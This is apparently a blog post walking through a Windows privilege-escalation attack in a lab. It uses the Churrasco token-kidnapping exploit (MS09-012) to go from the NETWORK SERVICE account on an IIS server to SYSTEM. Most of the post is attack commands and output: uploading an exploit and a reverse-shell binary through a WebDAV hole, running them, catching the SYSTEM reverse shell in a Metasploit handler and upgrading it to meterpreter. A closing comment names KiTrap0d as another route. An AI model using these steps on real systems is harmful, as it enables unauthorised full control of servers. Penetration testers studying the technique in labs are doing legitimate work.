http://www.argeniss.com/research.html
http://www.argeniss.com/research/TokenKidnapping.pdf
subsequently patched http://www.microsoft.com/technet/security/bulletin/MS09-012.mspx
I'm normally violently against uploading binaries to boxes but until the local exploit functionality is added to msf...
The gist is you an run the Churrasco binary and it will execute a command for you as SYSTEM from NETWORK SERVICE (the shell privs you get when exploiting IIS). See the slides for more.
Lets see it in action.
We have our network service shell, push up our churrasco binary, metasploit payload, and run it.
*I had issues on my VM getting staged payloads in msf to run, so I opted for a shell/reverse_tcp and then tried to upgrade the shell to meterpreter.
[*] Meterpreter session 3 opened (192.168.6.94:443 -> 192.168.6.94:62700)Upload the exploit binary and your reverse shell binary. I used the webdav vuln that got me on the box to upload it as churrasco.bin, network service is weird about where it can write to, but it should be writable somewhere if you don't have the file upload route.
meterpreter > getuid
Server username: NT AUTHORITY\NETWORK SERVICE
meterpreter > pwd
c:\windows\system32\inetsrv
meterpreter > shellLet's run the exploit and have it kick off our reverse shell back to us. Set up the multi/handler... blah blah
Process 3872 created.
Channel 1 created.
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\windows\system32\inetsrv>cd C:\Inetpub\wwwroot
C:\Inetpub\wwwroot>dir
dir
Volume in drive C has no label.
Volume Serial Number is F48F-220E
Directory of C:\Inetpub\wwwroot
05/10/2010 06:53 AM.
05/10/2010 06:53 AM..
05/10/2010 06:53 AM 410,624 Churrasco.bin
02/21/2003 06:48 PM 1,433 iisstart.htm
05/10/2010 07:19 AM 37,888 shell.bin
05/10/2010 07:43 AM 173 test4.asp;.txt
4 File(s) 2,105,685 bytes
2 Dir(s) 36,227,641,344 bytes free
C:\Inetpub\wwwroot>Churrasco.bin shell.binon the multi/handler side...
Churrasco.bin shell.bin
/churrasco/-->Current User: NETWORK SERVICE
/churrasco/-->Getting Rpcss PID ...
/churrasco/-->Found Rpcss PID: 668
/churrasco/-->Searching for Rpcss threads ...
/churrasco/-->Found Thread: 672
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 676
/churrasco/-->Thread not impersonating, looking for another thread...
/churrasco/-->Found Thread: 680
/churrasco/-->Thread impersonating, got NETWORK SERVICE Token: 0x730
/churrasco/-->Getting SYSTEM token from Rpcss Service...
/churrasco/-->Found NETWORK SERVICE Token
/churrasco/-->Found LOCAL SERVICE Token
/churrasco/-->Found SYSTEM token 0x728
/churrasco/-->Running command with SYSTEM Token...
/churrasco/-->Done, command should have ran as SYSTEM
[*] Command shell session 1 opened (192.168.6.94:443 -> 192.168.6.94:62854)
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
nt authority\system
C:\Inetpub\wwwroot>^Z
Background session 1? [y/N] y
msf exploit(handler) > sessions -u 1
msf exploit(handler) > [*] Meterpreter session 2 opened (192.168.6.94:443 -> 192.168.6.94:62855)
msf exploit(handler) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 shell Microsoft Windows [Version 5.2.3790] 192.168.6.94:443 -> 192.168.6.94:62854
2 meterpreter NT AUTHORITY\SYSTEM @ LAB 192.168.6.94:443 -> 192.168.6.94:62855
msf exploit(handler) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
1 comment:
jduck brought up a good point that if a box is vuln to ms09-012 then its also vuln to KiTrap0d and you can just got that route without uploading anything special.
Post a Comment